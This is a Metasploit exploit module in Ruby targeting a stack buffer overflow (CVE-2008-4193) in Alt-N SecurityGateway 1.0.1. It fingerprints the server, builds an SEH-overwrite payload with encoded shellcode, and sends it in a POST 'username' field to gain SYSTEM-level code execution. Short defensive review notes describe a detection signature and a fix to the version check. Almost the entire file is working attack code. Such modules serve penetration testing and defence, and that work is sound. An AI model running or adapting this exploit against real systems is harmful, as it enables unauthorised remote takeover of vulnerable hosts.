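##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Alt-N SecurityGateway "username" stack buffer overflow (CVE-2008-4193).
#
# Review notes (defensive):
# - The vulnerable product/version is identified from the "Server"-style
#   banner returned for /SecurityGateway.dll (see #auto_target); that banner
#   string is also what a network detection rule for this module's traffic
#   can key on, together with an oversized, percent-encoded "username" field
#   in a POST to /SecurityGateway.dll on the configured RPORT (4000).
# - The original #check never returned CheckCode::Appears (the value of the
#   `if` was discarded), so `check` always reported Safe even when
#   #auto_target matched a vulnerable build. Fixed below.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  # XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Seh

  # Module metadata and options. Only RPORT is registered here (default 4000);
  # RHOSTS and the rest come from the HttpClient mixin.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Alt-N SecurityGateway username Buffer Overflow',
      'Description'    => %q{
          Alt-N SecurityGateway is prone to a buffer overflow condition. This
        is due to insufficient bounds checking on the "username"
        parameter. Successful exploitation could result in code
        execution with SYSTEM level privileges.

        NOTE: This service doesn't restart, you'll only get one shot. However,
        it often survives a successful exploitation attempt.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-4193' ],
          [ 'OSVDB', '45854' ],
          [ 'BID', '29457']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 476,
          # note: 0xd7 might not be translated, but w/e
          'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'),
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::SingleStaticBit,
          'EncoderOptions' =>
            {
              'BitNumber' => 0x5,
              'BitValue' => true,
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic Targeting', { } ],
          # NOTE: the return address must be tolower() safe
          [ 'SecurityGateway 1.0.1 Universal', { 'Ret' => 0x6767756f }], # p/p/r in XceedZip.dll 4.5.77.0
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2008-06-02'))

    register_options(
      [
        Opt::RPORT(4000)
      ])
  end


  # Identify the target based on the SecurityGateway version number
  #
  # @return [Msf::Module::Target, nil] the matching entry of `targets`, or
  #   nil when the fingerprint does not name a version this module handles.
  def auto_target
    info = http_fingerprint({ :uri => '/SecurityGateway.dll' }) # automatic targetting
    if (info =~ /SecurityGateway (1\..*)$/)
      case $1
      when /1\.0\.1/
        return self.targets[1]
      end
    end
    # Not vulnerable
    nil
  end

  # Passive version check.
  #
  # @return [Exploit::CheckCode] Appears when #auto_target resolves a known
  #   vulnerable build, Safe otherwise. Uses an explicit `return`: the
  #   previous `if` without a return discarded Appears and always fell
  #   through to Safe.
  def check
    return Exploit::CheckCode::Appears if auto_target

    Exploit::CheckCode::Safe
  end

  # Build the request and send it once, then hand off to the payload handler.
  # The buffer layout below is order-sensitive; keep the statement order.
  def exploit

    # handle auto-targeting
    mytarget = target
    if target.name =~ /Automatic/
      print_status("Attempting to automatically select a target...")
      mytarget = auto_target
      if mytarget.nil?
        fail_with(Failure::NoTarget, "Unable to automatically select a target")
      end
      print_status("Automatically selected target \"#{mytarget.name}\"")
    end

    # the buffer gets CharLowerBuff()'d and passed to:
    # sprintf(str, "Attempt to login with invalid user name %s from %s", buf, ip_str);

    sploit = payload.encoded
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    sploit = Rex::Text.to_hex(sploit, '%')
    sploit << rand_text_alphanumeric(512)

    post_data = 'RequestedPage=login'
    post_data << '&username=' << sploit
    post_data << '&passwd=world'

    print_status("Sending request...")
    # 5-second response timeout; the service is not expected to answer
    # normally once the overflow is triggered.
    res = send_request_cgi({
      'uri'     => '/SecurityGateway.dll',
      'method'  => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data'    => post_data,
    }, 5)

    handler
  end
end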